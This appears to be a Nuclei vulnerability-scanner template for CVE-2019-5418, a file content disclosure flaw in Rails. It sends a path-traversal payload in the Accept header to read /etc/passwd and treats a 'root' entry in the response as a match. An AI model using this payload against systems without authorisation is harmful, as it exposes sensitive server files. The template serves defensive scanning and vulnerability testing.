id: CVE-2019-5418 info: name: Rails File Content Disclosure author: omarkurt severity: high description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2019-5418 - https://www.exploit-db.com/exploits/46585/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-5418 epss-score: 0.97379 tags: cve,cve2019,rails,lfi,disclosure,edb metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}" headers: Accept: ../../../../../../../../etc/passwd{{ matchers-condition: and matchers: - type: status status: - 200 - 500 - type: regex part: body regex: - "root:.*:0:0:" # Enhanced by mp on 2022/04/12